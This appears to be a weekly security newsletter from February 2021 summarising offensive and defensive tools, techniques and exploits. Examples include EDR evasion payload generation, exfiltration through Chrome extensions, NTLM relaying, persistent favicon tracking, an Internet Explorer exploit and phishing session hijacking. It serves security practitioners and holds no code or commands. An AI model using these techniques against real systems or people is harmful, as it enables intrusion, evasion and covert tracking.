Last Week in Security (LWiS) - 2021-02-08

An amazing payload generator (@Tyl0us), DynamicWrapperEx for COM fun (@am0nsec), Skype link spoofing (@mrd0x), getting into exploit dev (@dayzerosec), automated recon (@DhiyaneshDK), Relaying 101 (@theluemmel), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-02-01 to 2021-02-08.

News

Techniques

  • Endpoint Detection and Response: How Hackers Have Evolved. This blog is so good it has a second part. It goes over user-mode hooking and direct syscalls, but introduces some unique bypasses, side-by-side loading vs process injection, and the use of code signing and spoofed attributes via syso files. The ScareCrow tool that automates all this is well done and even can provide phishing-ready one liners or a macro payload.
  • supercookie uses favicons to assign a unique identifier to website visitors. Unlike traditional tracking methods, this ID can be stored almost persistently and cannot be easily cleared by the user. The tracking method works even in the browser's incognito mode and is not cleared by flushing the cache, closing the browser or restarting the system, using a VPN or installing AdBlockers. Scary stuff. You set up your tracking instance with the open sourced backend.
  • Microsoft Remote Desktop Web Access Authentication Timing Attack. The combination of returning the Active Directory Domain in an RPC response and a timing attack disclosing valid usernames allows a remote attacker with no knowledge of the target to enumerate valid Active Directory usernames using only RDWeb.
  • Abusing Google Chrome extension syncing for data exfiltration and C&C. The Google Chrome Sync feature allows for a decent amount of data to be exfiltrated from an infected browser. This plus the ability for extensions to snoop on all pages makes Chrome Extensions a natural attack vector (think oath tokens, cookies, etc). This has been happening for years.
  • DynamicWrapperEx – Windows API Invocation from Windows Script Host. This blog post will covers some basics of COM, how to leverage OLE Automation, the x64 standard calling convention, registration-free activation, and some of the limitations and security considerations around the use of a new tool published with the post.
  • Spoofing and Attacking With Skype. Tampering with requests to Skype allows for the creation of some pretty serious social engineering payloads.
  • Injecting Rogue DNS Records Using DHCP. Some environments automatically create DNS entries for DHCP host names which are user controlled. How can this be used? From the post - The first step would be to launch Responder in analysis mode (no poisoning) and listen for hosts broadcasting queries for hosts that they can’t resolve. Next, pick the most common one, inject a DNS record with the method above, and wait for an inbound connection from the querying system. If that account has a weak password, you might be able to crack it or potentially forward it is using NetNTLMRelayX.
  • Getting Started with Exploit Development. This is a good collection of resources as well as introduction to the topic.
  • Recon with Me !!!. Using some really nice "unix philosophy" tools, this post shows how to construct your on continuous monitoring solution for bug bounties or for blue teams to use against themselves.
  • Relaying 101. Need a quick overview of the many ways relaying can be used in a Windows environment? @theluemmel has you covered, with a healthy dose of self-deprecating memes for good measure.
  • In-depth dive into the security features of the Intel/Windows platform secure boot process. If you've ever wondered what really happens when you boot an Intel based Windows computer with SecureBoot enabled, this post will show you in great detail.
  • Reverse engineering Emotet – Our approach to protect GRNET against the trojan. This post is chock full of meaty reverse engineering detail. If you were ever curious how major botnets went from email opens to trojan'd machines without tripping AV/EDR, this post is for you.

Tools and Exploits

  • raptor_infiltrate20 contains multiple exploits (some 0days?) for Solaris 10 and 11. The talk is worth checking out as well. Even modern operating systems have some dumb logic bugs left.
  • PatrowlHears is an advanced and real-time Vulnerability Intelligence platform, including CVE, exploits and threats news. This commercially developed continuous monitoring system is now open source (AGPL)!
  • Forrest_Orr_CVE-2020-0674_32bit.html. This is a Microsoft Internet Explorer 8-11 32-bit Use-After-Free exploit. It targets 32-bit vs the metasploit 64-bit only exploit which is important as IE is 32-bit by default on Windows 7 and 8.1. As with everything Forrest Orr does, it's a work of art and bypasses DEP, ASLR, and EMET 5.5 (EAF, EAF+, stack pivot protection, SimExec, and CallerCheck).
  • squealer scans a local git repository for secrets that are being leaked deep within the commit history using regular expressions. Use it on offensive engagements or as part of your CI to keep secrets out of git repositories.
  • Awesome_Firebase_DomainFront is a repository for a Firebase domain fronting application. This is a demonstration application that uses firebase cloud functions to front traffic. You can use arbitrary *.web.app domains. See the blog post for more information.
  • SharpSMBSpray sprays a hash via smb to check for local administrator access. With SharpMapExec you'd have to specify a list of computer names vs a network range in SharpSMBSpray.
  • rsa_sign2n contains experimental code to calculate RSA public keys based on two known message-signature pairs, code to extract and generate RSA and HMAC signatures for JWTs, and proof-of-concept code to exploit the CVE-2017-11424 key confusion vulnerability in pyJWT, without knowing the public key of the target (all details here).
  • Shield - not new, but with a shiny new EndpointSecurity entitlement from Apple it can be easily installed. More information on this injection attack protection tool here.
  • SharpRelay automates the process of loading the WinDivert driver (signed) and communicate with it to pull of an NTLM relay remotely through a Cobalt Strike beacon. If you don't want to load the driver, InveighZero may do what you need.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • necrobrowser is a browser instrumentation microservice written in NodeJS: it uses the Puppeteer library to control instances of Chrome or Firefox in headless and GUI mode. The idea is to feed NecroBrowser with web sessions harvested during phishing campaigns (see Muraena) to quickly perform actions hijacking the victim session.
  • uroboros is a GNU/Linux monitoring tool focused on single processes. This could be a useful first step for dynamic analysis of a Linux binary.
  • Information Security Reference is a very complete resource for all things Information Security.

This post is cross-posted on SIXGEN's blog.